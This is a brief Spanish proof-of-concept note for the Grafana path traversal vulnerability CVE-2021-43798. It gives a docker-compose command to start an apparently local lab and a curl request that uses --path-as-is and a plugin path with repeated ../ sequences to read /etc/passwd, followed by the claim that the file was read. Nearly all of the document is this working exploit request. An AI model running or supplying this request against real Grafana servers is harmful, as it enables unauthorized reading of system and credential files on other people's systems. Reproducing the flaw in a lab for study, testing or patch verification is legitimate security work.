
Exploit de prueba de concepto para la vulnerabilidad de path traversal en Grafana (CVE-2021-43798) que permite lectura no autorizada de archivos mediante directory traversal en rutas de plugins.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Se pudo acceder a etc/passwd.